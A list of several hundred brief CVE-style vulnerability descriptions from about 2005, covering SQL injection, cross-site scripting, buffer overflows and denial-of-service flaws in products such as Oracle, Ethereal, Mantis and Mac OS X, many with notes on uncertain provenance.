Multiple SQL injection vulnerabilities in PEARLINGER Pearl Forums 2.4 allow remote attackers to execute arbitrary SQL commands via the (1) forumsId and (2) topicId parameters in index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in index.php in PEARLINGER Pearl Forums 2.4 allows remote attackers to include arbitrary files via the mode parameter, possibly due to a directory traversal vulnerability.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in ActiveCampaign SupportTrio 1.4 allows remote attackers to execute arbitrary SQL commands via the page parameter.  NOTE: the provenance of this information is unknown because the source URL is not available; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in Koobi 5 allows remote attackers to inject arbitrary web script or HTML via nested, malformed url BBCode tags.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the GTP dissector for Ethereal 0.9.1 to 0.10.13 allows remote attackers to cause a denial of service (infinite loop) via unknown attack vectors.
Multiple HTTP response splitting vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to inject arbitrary HTTP headers via unknown attack vectors in an unspecified input form.
Multiple SQL injection vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to execute arbitrary SQL commands via unknown attack vectors in an unspecified input form.
Multiple cross-site scripting (XSS) vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in an unspecified input form.
Multiple SQL injection vulnerabilities in myEZshop Shopping Cart allow remote attackers to execute arbitrary SQL commands via the (1) GroupsId and (2) ItemsId parameters in admin.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in myEZshop Shopping Cart allows remote attackers to inject arbitrary web script or HTML via the Keyword parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in the Internet Key Exchange version 1 (IKEv1) implementation in ADTRAN NetVanta before 10.03.03.E might allow remote attackers to have an unknown impact via crafted IKE packets, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1.
Format string vulnerability in the Internet Key Exchange version 1 (IKEv1) implementation in ADTRAN NetVanta before 10.03.03.E might allow remote attackers to have an unknown impact via format string specifiers in crafted IKE packets, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1.
Buffer overflow in Golden FTP Server 1.92 allows remote attackers to execute arbitrary code via a long APPE command.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in the "user area" in RWS Statistics Counter before 2.4.1 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Cross-site scripting (XSS) vulnerability in search.asp in NetDirect ShopEngine allows remote attackers to inject arbitrary web script or HTML via the EXPS parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The Chatspot 2.0.0a7 module for phpBB might allow remote attackers to impersonate other users via unknown vectors.
SQL injection vulnerability in the Chatspot 2.0.0a7 module for phpBB allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Mantis 1.0.0rc3 does not properly handle "Make note private" when a bug is being resolved, which has unknown impact and attack vectors, probably related to an information leak.
Unspecified "port injection" vulnerabilities in filters in Mantis 1.0.0rc3 and earlier have unknown impact and attack vectors.  NOTE: due to a lack of relevant details in the vendor changelog, which is the source of this description, it is unclear whether this is a duplicate of another CVE.
SQL injection vulnerability in index.asp in pTools allows remote attackers to execute arbitrary SQL commands via the docID parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in MusicBox 2.3 allows remote attackers to execute arbitrary SQL commands via the (1) show and (2) type parameter.  NOTE: the provenance of this information is unknown, although it was later rediscovered.
Cross-site request forgery (CSRF) vulnerability in phpMyAdmin 2.7.0 allows remote attackers to perform unauthorized actions as a logged-in user via a link or IMG tag to server_privileges.php, as demonstrated using the dbname and checkprivs parameters.  NOTE: the provenance of this issue is unknown, although third parties imply that it is related to the disclosure of CVE-2005-4349, which was labeled as SQL injection but disputed.
Cross-site scripting (XSS) vulnerability in index.php AbleDesign D-Man 3.x allows remote attackers to inject arbitrary web script or HTML via the title parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in AbleDesign ReSearch 2.x allows remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
util-vserver before 0.30.208-1 with kernel-patch-vserver before 1.9.5.5 and 2.x before 2.3 for Debian GNU/Linux sets a default policy that trusts unknown capabilities, which could allow local users to conduct unauthorized activities.
Unspecified vulnerability in Teamwork 3 before alpha 1.7 has unknown impact and attack vectors, related to "a menu security bug."
SQL injection vulnerability in default.asp in Media2 CMS Shop 18.x allows remote attackers to execute arbitrary SQL commands via the item parameter.  NOTE: the provenance of this issue is unknown; the details were obtained solely from third party sources.
Cross-site scripting (XSS) vulnerability in admin/Default.asp in iCMS allows remote attackers to inject arbitrary web script or HTML via the LoginMSG parameter.  NOTE: the provenance of this issue is unknown; the details were obtained solely from third party sources.
SQL injection vulnerability in UStore allows remote attackers to execute arbitrary SQL commands via the (1) username and (2) password fields.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in UStore allow remote attackers to inject arbitrary web script or HTML via the (1) Cat parameter in default.asp and the (2) accessdenied parameter in admin/default.asp.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in WBEM Services A.01.x before A.01.05.12 and A.02.x before A.02.00.08 on HP-UX B.11.00 through B.11.23 allows remote attackers to cause an unspecified denial of service via unknown attack vectors.
Multiple unspecified vulnerabilities in Driverse before 0.56b have unknown impact and attack vectors, related to (1) a "ptrace exploit" and (2) "some other potential security problems."
Cross-site scripting (XSS) vulnerability in Absolute Image Gallery XE 2.x allows remote attackers to inject arbitrary web script or HTML via the text parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in PhpLogCon before 1.2.2 allows remote attackers to use arbitrary profiles via unknown vectors involving "'smart' values for userid and password," probably involving an SQL injection vulnerability in the (1) pass and (2) usr parameters in submit.php.
Westell Versalink 327W allows remote attackers to cause a denial of service (device crash) via an IP packet with the same source and destination IPs and ports, and with the SYN flag set (aka LanD). NOTE: the provenance of this issue is unknown; the details are obtained solely from third party information.
Scientific Atlanta DPX2100 Cable Modem allows remote attackers to cause a denial of service (device crash) via an IP packet with the same source and destination IPs and ports, and with the SYN flag set (aka LanD), as demonstrated using hping2.  NOTE: the provenance of this issue is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Business Objects WebIntelligence 6.5x allows remote attackers to cause a denial of service (user account lock out) via unknown attack vectors related to "authentication mechanisms" and "form input."
Unspecified vulnerability in Positive Software Corporation CP+ (cpplus) before 2.5.5 allows attackers to have unknown impact and attack vectors, related to "a possible security flaw caused by a bug in Perl." NOTE: unless CP+ includes its own copy of Perl with CVE-2005-3962, this is a different vulnerability than CVE-2005-3962; however, there is insufficient information to be sure.
Multiple SQL injection vulnerabilities in ASPBB 0.4 allow remote attackers to execute arbitrary SQL commands via the (1) TID parameter in topic.asp, (2) FORUM_ID parameter in forum.asp, and (3) PROFILE_ID parameter in profile.asp.  NOTE: the provenance of this issue is unknown; the details are obtained solely from the BID.
Unspecified Cisco Catalyst Switches allow remote attackers to cause a denial of service (device crash) via an IP packet with the same source and destination IPs and ports, and with the SYN flag set (aka LanD). NOTE: the provenance of this issue is unknown; the details are obtained solely from the BID.
Linksys WRT54GS and BEFW11S4 allows remote attackers to cause a denial of service (device crash) via an IP packet with the same source and destination IPs and ports, and with the SYN flag set (aka LAND). NOTE: the provenance of this issue is unknown; the details are obtained solely from the BID.
Cross-site scripting (XSS) vulnerability in forum.asp in ASP-DEV XM Forum RC3 allows remote attackers to inject arbitrary web script or HTML via the forum_title parameter.  NOTE: the provenance of this issue is unknown; the details are obtained solely from the BID.  In addition, its accuracy is in question because "forum_title" does not appear to be specified in the source code for XM Forum RC3.  It is possible, but not certain, that this is CVE-2004-2211.
Cross-site scripting (XSS) vulnerability in auction.pl in EveryAuction 1.53 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.  NOTE: the provenance of this issue is unknown; the details were obtained solely from third party sources and independently verified using source code inspection.
Multiple unspecified vulnerabilities in MyBulletinBoard (MyBB) before 1.0 have unknown impact and attack vectors, a different set of vulnerabilities than those identified by CVE-2005-4199.
SQL injection vulnerability in index.php in Netref 3.0 allows remote attackers to execute arbitrary SQL commands via the cat parameter. NOTE: the provenance of this issue is unknown; the details were obtained solely from third party sources.
Cross-site scripting (XSS) vulnerability in the portal login page in Computer Associates CleverPath 4.7 allows remote attackers to execute Javascript via unknown vectors.
Unspecified vulnerability in HP-UX B.11.00 to B.11.23, when IPSEC is running, allows remote attackers to have unknown impact.
Unspecified "absolute path vulnerability" in umountall in IBM AIX 5.1 through 5.3 allows local users to cause unknown impact via unknown vectors.
SQL injection vulnerability in the search module in Edgewall Trac before 0.9.2 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Unspecified vulnerability in System Communications Services 6 Delegated Administrator 2005Q1 in Sun Java System Messaging Server 2005Q1 allows remote attackers to obtain the Top-Level Administrator (TLA) default password via unknown vectors, possibly involving configure_toplevel_admin.ldif.
Unspecified vulnerability in the zipcart module in Gallery 2.0 before 2.0.2 allows remote attackers to read arbitrary files via unknown vectors.
Multiple unspecified vulnerabilities in SAPID CMS before 1.2.3.03, related to newly registered users and possibly authorization checks, have unknown impact and attack vectors involving (1) mvc/controller/user_request_analysis.inc.php and (2) usr/xml/ddc/authorization.xml.
Unknown vulnerability in the login page for HP Systems Insight Manager (SIM) 4.0 and 4.1, when accessed by Microsoft Internet Explorer with the MS04-025 patch, leads to a denial of service (browser hang). NOTE: although the advisory is vague, this issue does not appear to involve an attacker at all.  If not, then this issue is not a vulnerability.
Cross-site scripting (XSS) vulnerability in MXChange before 0.2.0-pre10 PL492 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
SQL injection vulnerability in MXChange before 0.2.0-pre10 PL492 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Unspecified vulnerability in the Trackback functionality in DotClear 1.2.1 has unknown impact and attack vectors.
Buffer overflow in Symantec pcAnywhere 11.0.1, 11.5.1, and all other 32-bit versions allows remote attackers to cause a denial of service (application crash) via unknown attack vectors.
Unspecified vulnerability in Java Runtime Environment in Java JDK and JRE 5.0 Update 3 and earlier allows remote attackers to escape the Java sandbox and access arbitrary files or execute arbitrary applications via unknown attack vectors involving untrusted Java applets.
Multiple unspecified vulnerabilities in reflection APIs in Java SDK and JRE 1.4.2_08 and earlier and JDK and JRE 5.0 Update 3 and earlier allow remote attackers to escape the Java sandbox and access arbitrary files or execute arbitrary applications via unknown attack vectors, a different set of vulnerabilities than CVE-2005-3905.  NOTE: this is associated with the "second and third issues" identified in SUNALERT:102003.
Unspecified vulnerability in reflection APIs in Java SDK and JRE 1.3.1_15 and earlier, 1.4.2_08 and earlier, and JDK and JRE 5.0 Update 3 and earlier allows remote attackers to escape the Java sandbox and access arbitrary files or execute arbitrary application via unknown attack vectors, a different vulnerability than CVE-2005-3906.  NOTE: this is associated with the "first issue" identified in SUNALERT:102003.
Unspecified vulnerability in Java Management Extensions (JMX) in Java JDK and JRE 5.0 Update 3, 1.4.2 and later, 1.3.1 and later allows remote attackers to escape the Java sandbox and access arbitrary files or execute arbitrary application via unknown attack vectors.
Unspecified vulnerability in in.named in Solaris 9 allows attackers to cause a denial of service via unknown manipulations that cause in.named to "make unnecessary queries."
Unspecified vulnerability in xterm for HP-UX 11.00, 11.11, and 11.23 allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in MyBulletinBoard (MyBB) before 1.0 PR2 Rev 686 allows attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in Joomla! before 1.0.4 has unknown impact and attack vectors, related to "Potential misuse of Media component file management functions."
The image gallery (imagegallery) component in Exponent CMS 0.96.3 and later versions does not properly check the MIME type of uploaded files, with unknown impact from the preview icon, possibly involving injection of HTML.
Unspecified vulnerability in ldapdiff before 1.1.1 has unknown impact and attack vectors, related to "ldapdiff.conf path construction".
Unspecified "absolute path vulnerabilities" in the diagela command (diagela.sh) in IBM AIX 5.2 and 5.3 have unknown impact and attack vectors.
Unspecified vulnerability in yaSSL before 1.0.6 has unknown impact and attack vectors, related to "certificate chain processing."
Heap-based buffer overflow in WebKit in Mac OS X and OS X Server 10.3.9 and 10.4.3, as used in applications such as Safari, allows remote attackers to execute arbitrary code via unknown attack vectors.
Unspecified vulnerability in passwordserver in Mac OS X Server 10.3.9 and 10.4.3, when creating an Open Directory master server, allows local users to gain privileges via unknown attack vectors.
Unknown vulnerability in iodbcadmintool in the ODBC Administrator utility in Mac OS X and OS X Server 10.3.9 and 10.4.3 allows local users to execute arbitrary code via unknown attack vectors.
Multiple unspecified vulnerabilities in multiple unspecified implementations of Internet Key Exchange version 1 (IKEv1) have multiple unspecified attack vectors and impacts related to denial of service, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1. NOTE: due to the lack of information in the original sources, it is likely that this candidate will be REJECTed once it is known which implementations are actually vulnerable.  In addition, since "denial of service" is an impact and not a vulnerability, it is unknown which underlying vulnerabilities are actually covered by this particular candidate.
initscripts in Red Hat Enterprise Linux 4 does not properly handle certain environment variables when /sbin/service is executed, which allows local users with sudo permissions for /sbin/service to gain root privileges via unknown vectors.
Buffer overflow in the JBIG2Bitmap::JBIG2Bitmap function in JBIG2Stream.cc in Xpdf, as used in products such as gpdf, kpdf, pdftohtml, poppler, teTeX, CUPS, libextractor, and others, allows attackers to modify memory and possibly execute arbitrary code via unknown attack vectors.
Improper boundary checks in petite.c in Clam AntiVirus (ClamAV) before 0.87.1 allows attackers to perform unknown attacks via unknown vectors.
INSO service in IBM DB2 Content Manager before 8.2 Fix Pack 10 on AIX allows attackers to cause a denial of service (application crash) via unknown attack vectors involving LZH files.
slapd daemon in IBM Tivoli Directory Server (ITDS) 5.2.0 and 6.0.0 binds using SASL EXTERNAL, which allows attackers to bypass authentication and modify and delete directory data via unknown attack vectors.
Unknown vulnerability in remshd daemon in HP-UX B.11.00, B.11.11, and B.11.23 while running in "Trusted Mode" allows remote attackers to gain unauthorized system access via unknown attack vectors.
envd daemon in HP-UX B.11.00 through B.11.11 allows local users to obtain privileges via unknown attack vectors.
Multiple eval injection vulnerabilities in the help function in PHPKIT 1.6.1 R2 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary code on the server via unknown attack vectors involving uninitialized variables.
Buffer overflow in KETM 0.0.6 allows local users to execute arbitrary code via unknown vectors.
Serv-U FTP Server before 6.1.0.4 allows attackers to cause a denial of service (crash) via (1) malformed packets and possibly other unspecified issues with unknown impact and attack vectors including (2) use of "~" in a pathname, and (3) memory consumption of the daemon.  NOTE: it is not clear whether items (2) and above are vulnerabilities.
Unspecified vulnerability in Enterprise CRM Sales in Oracle 8.81 up to 8.9 has unknown impact and attack vectors, as identified by Oracle Vuln# CRM01.
Unspecified vulnerability in JDEdwards HTML Server in Oracle EnterpriseOne 8.94 OneWorld XE up to 8.95_B1, 8.94_Q1, and SP23_K1 has unknown impact and attack vectors, as identified by Oracle Vuln# JDE01.
Unspecified vulnerability in PeopleTools in Oracle PeopleSoft Enterprise 8.44 up to 8.46 has unknown impact and attack vectors, as identified by Oracle Vuln# PSE04.
Unspecified vulnerability in PeopleTools in Oracle PeopleSoft Enterprise 8.44 up to 8.46.03 has unknown impact and attack vectors, as identified by Oracle Vuln# PSE03.
Unspecified vulnerability in PeopleTools in Oracle PeopleSoft Enterprise 8.44 up to 8.46.02 has unknown impact and attack vectors, as identified by Oracle Vuln# PSE02.
Unspecified vulnerability in PeopleTools in Oracle PeopleSoft Enterprise 8.42 up to 8.45.17 has unknown impact and attack vectors, as identified by Oracle Vuln# PSE01.
Unspecified vulnerability in Oracle Agent in Oracle Enterprise Manager 9.0.4.1 up to 10.1.0.4 has unknown impact and attack vectors, as identified by Oracle Vuln# EM01.
Unspecified vulnerability in Oracle E-Business Suite and Applications 4.5 up to 4.5.1 has unknown impact and attack vectors, as identified by Oracle Vuln# APPS22 in Oracle Clinical.
Unspecified vulnerability in Oracle E-Business Suite and Applications 11.0 up to 11.5.9 has unknown impact and attack vectors, as identified by Oracle Vuln# APPS19 in Workflow Cartridge.
Unspecified vulnerability in Oracle E-Business Suite and Applications 11.0 up to 11.5.10 has unknown impact and attack vectors, as identified by Oracle Vuln# APPS08 in HRMS.
Multiple unspecified vulnerabilities in Oracle E-Business Suite and Applications 11.5 up to 11.5.9 have unknown impact and attack vectors, as identified by Oracle Vuln# (1) APPS04 in Application Object Library, and (2) APPS17, (3) APPS18, and (4) APPS21 in Workflow Cartridge.
Multiple unspecified vulnerabilities in Oracle E-Business Suite and Applications 11.5 up to 11.5.10 have unknown impact and attack vectors, as identified by Oracle Vuln# (1) APPS01 in Application Install; (2) APPS02 and (3) APPS03 in Application Object Library; (4) APPS05 and (5) APPS06 in Applications Technology Stack; (6) APPS07 in Applications Utilities; (7) APPS09, (8) APPS10, and (9) APPS11 in HRMS; (10) APPS12 in Mobile Application Foundation; (11) APPS13 in SDP Number Portability; (12) APPS14 in Oracle Service; (13) APPS15 in Service Fulfillment Manage, (14) APPS16 in Universal Work Queue; and (15) APPS20 in Workflow Cartridge.
Multiple unspecified vulnerabilities in Oracle Collaboration Suite 10g Release 1 version 10.1.1 and 9i Release 2 9.0.4.2 have unknown impact and attack vectors, as identified by Oracle Vuln# (1) OCS01, (2) OCS02, (3) OCS03, and (4) OCS04 for Calendar; (5) OCS05, (6) OCS06, (7) OCS07, (8) OCS08, (9) OCS09, and (10) OCS10 for Email Server; and (11) OCS11, (12) OCS12, and (13) OCS13 for Oracle Files.
Multiple unspecified vulnerabilities in Web Cache in Oracle Application Server 1.0 up to 10.1.2.0 has unknown impact and attack vectors, as identified by Oracle Vuln# (1) AS12 and (2) AS14.
Unspecified vulnerability in Web Cache in Oracle Application Server 1.0 up to 9.0.4.2 has unknown impact and attack vectors, as identified by Oracle Vuln# AS13.
Unspecified vulnerability in SQL*ReportWriter in Oracle Application Server 9.0 up to 9.0.2.1 has unknown impact and attack vectors, as identified by Oracle Vuln# AS10.
Unspecified vulnerability in the HTTP Server in Oracle Application Server 1.0 up to 9.0.2.3 has unknown impact and attack vectors, as identified by Oracle Vuln# AS04.
Multiple unspecified vulnerabilities in Oracle Application Server 9.0 up to 10.1.2.0 have unknown impact and attack vectors, as identified by Oracle Vuln# (1) AS02 in Containers for J2EE, (2) AS07 in Internet Directory, (3) AS09 in Report Server, and (4) AS11 in Web Cache.
Unspecified vulnerability in the OC4J Module in Oracle Application Server 9.0 up to 10.1.2.0.2 has unknown impact and attack vectors, as identified by Oracle Vuln# AS01.
Unspecified vulnerability in Single Sign-On in Oracle Database Server 10g up to 10.1.0.4.2 and Application Server 9.0.2.3 up to 9.0.4.2 has unknown impact and attack vectors, aka Oracle Vuln# DB33 and AS08.
Unspecified vulnerability in Internet Directory in Oracle Database Server 9i up to 9.2.0.6 and Application Server 9.0.2.3 up to 10.1.2.0 has unknown impact and attack vectors, aka Oracle Vuln# DB32 and AS06.
Multiple unspecified vulnerabilities in HTTP Server in Oracle Database Server 8i up to 10.1.0.4.2 and Application Server 1.0.2.2 up to 10.1.2.0 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB30 and AS03 or (2) DB31 and AS05.
Multiple unspecified vulnerabilities in the Programmatic Interface in Oracle Database Server from 8i up to 9.2.0.5 have unknown impact and attack vectors, aka Oracle Vuln# DB26.
Unspecified vulnerability in the Spatial component in Oracle Database Server from 9i up to 10.1.0.3 has unknown impact and attack vectors, aka Oracle Vuln# DB17.
Multiple unspecified vulnerabilities in Oracle Database Server 8i up to 10.1.0.4.2 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB09 in Export, (2) DB11 in Materialized Views, and (3) DB16 in Security Service.
Unspecified vulnerability in Intelligent Agent in Oracle Database Server 9i up to 9.0.1.5 has unknown impact and attack vectors, aka Oracle Vuln# DB14.
Unspecified vulnerability in Database Scheduler in Oracle Database Server 10g up to 10.1.0.3 has unknown impact and attack vectors, aka Oracle Vuln# DB08.
Multiple unspecified vulnerabilities in Oracle Database Server 10g up to 10.1.0.4.2 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB02, (2) DB03, and (3) DB05 in Change Data Capture; (4) DB07 in Data Pump Export; and (5) DB18, (6) DB19, (7) DB20, (8) DB21, (9) DB22, (10) DB23, (11) DB24, and (12) DB25 in the Spatial component.
Multiple unspecified vulnerabilities in Oracle Database Server 9i up to 10.1.0.4.2 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB04 in Change Data Capture; (2) DB06 in Data Guard Logical Standby; (3) DB10 in Locale; (4) DB12 in Materialized Views; (5) DB13 in Objects Extension; (6) DB15 in Oracle Label Security; (7) DB27 in Security, possibly due to a buffer overflow in sys.pbsde.init; and (8) DB28 and (9) DB29 in Workspace Manager.
Unspecified vulnerability in the PL/SQL component in Oracle Database Server 9i up to 10.1.0.4 has unknown impact and attack vectors, aka Oracle Vuln# DB01.
SQL injection vulnerability in phpESP 1.7.5 and earlier allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Cross-site scripting (XSS) vulnerability in phpESP 1.7.5 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple vulnerabilities in PHP before 4.4.1 allow remote attackers to bypass safe_mode and open_basedir restrictions via unknown attack vectors in (1) ext/curl and (2) ext/gd.
Directory traversal vulnerability in GNU Gnump3d before 2.9.8 has unknown impact via "CGI parameters, and cookie values".
The tuxpaint-import.sh script in Tux Paint (tuxpaint) 0.9.14 and earlier creates temporary files insecurely, with unknown impact and attack vectors.
Mantis before 0.19.3 caches the User ID longer than necessary, which has unknown impact and attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Mantis before 0.19.3 allow remote attackers to inject arbitrary web script or HTML via (1) unknown vectors involving Javascript and (2) mantis/view_all_set.php.
SQL injection vulnerability in Mantis 1.0.0RC2 and 0.19.2 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in eBASEweb 3.0 allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
Multiple buffer overflows in OpenWBEM on SuSE Linux 9 allow remote attackers to execute arbitrary code via unknown vectors.
Multiple integer overflows in OpenWBEM on SuSE Linux 9 allow remote attackers to execute arbitrary code via unknown vectors.
Cross-site scripting (XSS) vulnerability in TikiWiki before 1.9.1.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Splatt Forum 3.0 to 3.2 allows remote attackers to bypass authentication via unknown vectors.
Unknown vulnerability in Solaris 10 allows local users to cause a denial of service (panic) via unknown vectors related to the "/proc" filesystem, which trigger a null dereference.
Unspecified vulnerability in the WSP dissector in Ethereal 0.10.1 to 0.10.12 allows remote attackers to cause a denial of service or corrupt memory via unknown vectors that cause Ethereal to free an invalid pointer.
Unspecified vulnerability in the X11 dissector in Ethereal 0.10.12 and earlier allows remote attackers to cause a denial of service (divide-by-zero) via unknown vectors.
The SigComp UDVM in Ethereal 0.10.12 allows remote attackers to cause a denial of service (infinite loop) via unknown vectors.
Ethereal 0.10.12 and earlier allows remote attackers to cause a denial of service (null dereference) via unknown vectors in the (1) SCSI, (2) sFlow, or (3) RTnet dissectors.
Unspecified vulnerability in the ONC RPC dissector in Ethereal 0.10.3 to 0.10.12, when the "Dissect unknown RPC program numbers" option is enabled, allows remote attackers to cause a denial of service (memory consumption).
The BER dissector in Ethereal 0.10.3 to 0.10.12 allows remote attackers to cause a denial of service (infinite loop) via unknown vectors.
Multiple buffer overflows in Ethereal 0.10.12 and earlier might allow remote attackers to execute arbitrary code via unknown vectors in the (1) SLIMP3 and (2) AgentX dissector.
Ethereal 0.10.12 and earlier allows remote attackers to cause a denial of service (crash) via unknown vectors in (1) the IrDA dissector and (2) the SMB dissector when SMB transaction payload reassembly is enabled.
Cross-site scripting (XSS) vulnerability in Mantis before 1.0.0rc1 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors, as identified by bug#0005751 "thraxisp".
SQL injection vulnerability in Zengaia before 0.2 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
SQL injection vulnerability in pages/forum/submit.html in Interchange 4.9.3 up to 5.2.0 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Unspecified vulnerability in Eric Integrated Development Environment (eric3) before 3.7.2 has unknown impact and attack vectors related to a "potential security exploit."
Buffer overflow in getconf in IBM AIX 5.2 to 5.3 allows local users to execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in Opera 8.50 on Linux and Windows have unknown impact and attack vectors, related to (1) " handling of must-revalidate cache directive for HTTPS pages" or (2) a "display issue with cookie comment encoding."
Multiple unspecified vulnerabilities in the WYSIWYG editor in PHP-Nuke before 7.9 Final have unknown impact and attack vectors.
Unspecified vulnerability in the "tl" driver in Solaris 10 allows local users to cause a denial of service (panic) via unknown vectors.
Unknown vulnerability in the net-svc script on Solaris 10 allows remote authenticated users to execute arbitrary code on a DHCP client via certain DHCP responses.
Unknown vulnerability in CIFS.NLM in Novell Netware 6.5 SP2 and SP3, 5.1, and 6.0 allows remote attackers to cause a denial of service (ABEND) via an incorrect password length, as exploited by the "worm.rbot.ccc" worm.
Multiple unknown vulnerabilities in MAXdev MD-Pro 1.0.72 and earlier have unknown impact and unspecified attack vectors, in one or more of the (1) Download, (2) Search, (3) Web links, (4) Blocks, (5) Messages, (6) News, (7) Comments, (8) Settings, (9) Stats or (10) subjects modules.
BFCommand &amp; Control Server Manager BFCC 1.22_A and earlier, and BFVCC 2.14_B and earlier, allows remote attackers to bypass authentication via (1) an unknown attack vector or (2) a NULL (0x00) as a username.
Heap-based buffer overflow in CoreFoundation in Mac OS X and OS X Server 10.4 through 10.4.3 allows remote attackers to execute arbitrary code via unknown attack vectors involving "validation of URLs."
Unspecified vulnerability in the command line processing (CLI) logic in Cisco Intrusion Prevention System 5.0(1) and 5.0(2) allows local users with OPERATOR or VIEWER privileges to gain additional privileges via unknown vectors.
Multiple buffer overflows in Computer Associates (CA) Message Queuing (CAM / CAFT) 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13 allow remote attackers to execute arbitrary code via unknown vectors.
Unknown vulnerability in Computer Associates (CA) Message Queuing (CAM / CAFT) 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13 allows attackers to cause a denial of service via unknown vectors, aka the "CAM TCP port vulnerability."
Buffer overflow in the LZX decompression in CHM Lib (chmlib) 0.35, as used in products such as KchmViewer, has unknown impact and attack vectors.
Unknown vulnerability in common-lisp-controller 4.18 and earlier allows local users to gain privileges by compiling arbitrary code in the cache directory, which is executed by another user if the user has not run Common Lisp before.
Cross-site scripting (XSS) vulnerability in Xerox MicroServer Web Server in Document Centre 220 through 265, 332 and 340, 420 through 490, and 535 through 555 allows remote attackers to inject arbitrary web script or HTML and modify web pages via unknown vectors.
Unknown vulnerability in Xerox MicroServer Web Server in Document Centre 220 through 265, 332 and 340, 420 through 490, and 535 through 555 allows remote attackers to cause a denial of service or read files via unknown vectors involving crafted HTTP requests.
Unknown vulnerability in Xerox MicroServer Web Server in Document Centre 220 through 265, 332 and 340, 420 through 490, and 535 through 555 allows remote attackers to bypass authentication.
Unknown vulnerability in pam_ldap before 180 does not properly handle a new password policy control, which could allow attackers to gain privileges.  NOTE: CVE-2005-2497 had also been assigned to this issue, but CVE-2005-2641 is the correct candidate.
Unspecified vulnerability in Kismet before 2005-08-R1 allows remote attackers to have an unknown impact via unprintable characters in the SSID.
Unknown vulnerability in session.php in EQdkp before 1.3.0 has unknown impact and attack vectors, possibly involving auto_login_id.
Unknown vulnerability in CPAINT Ajax Toolkit before 1.3-SP allows attackers to execute arbitrary PHP or ASP code or read files via unknown vectors.
Unknown vulnerability in the "frontend authentication" in PHlyMail 3.02.00 has unknown impact and attack vectors.
Unknown vulnerability in Lasso Professional Server8.0.4 and 8.0.5 allows attackers to bypass authentication, related to [Auth] tags.
Parlano MindAlign 5.0 and later versions uses weak encryption, with unknown impact and attack vectors.
Unknown vulnerability in Parlano MindAlign 5.0 and later versions allows remote attackers to bypass authentication via unknown vectors.
Parlano MindAlign 5.0 and later versions allows remote attackers to list valid users via unknown vectors, aka the "User Enumeration" vulnerability.
Cross-site scripting (XSS) vulnerability in Parlano MindAlign 5.0 and later versions allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unknown vulnerability in Linksys WRT54GS wireless router with firmware 4.50.6, with WPA Personal/TKIP authentication enabled, allows remote clients to bypass authentication by connecting without using encryption.
Unknown vulnerability in HP ProLiant DL585 servers running Integrated Lights Out (ILO) firmware before 1.81 allows attackers to access server controls when the server is "powered down."
Buffer overflow in dhost.exe in iMonitor for Novell eDirectory 8.7.3 on Windows allows attackers to cause a denial of service (crash) and obtain access to files via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Weblog Server in Mac OS X 10.4 to 10.4.2 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
Buffer overflow in traceroute in Mac OS X 10.3.9 allows local users to execute arbitrary code via unknown vectors.
Unknown vulnerability in HItoolbox for Mac OS X 10.4.2 allows VoiceOver services to read secure input fields.
Unknown vulnerability in Mac OS X 10.4.2 and earlier, when using Kerberos authentication with LDAP, allows attackers to gain access to a root Terminal window.
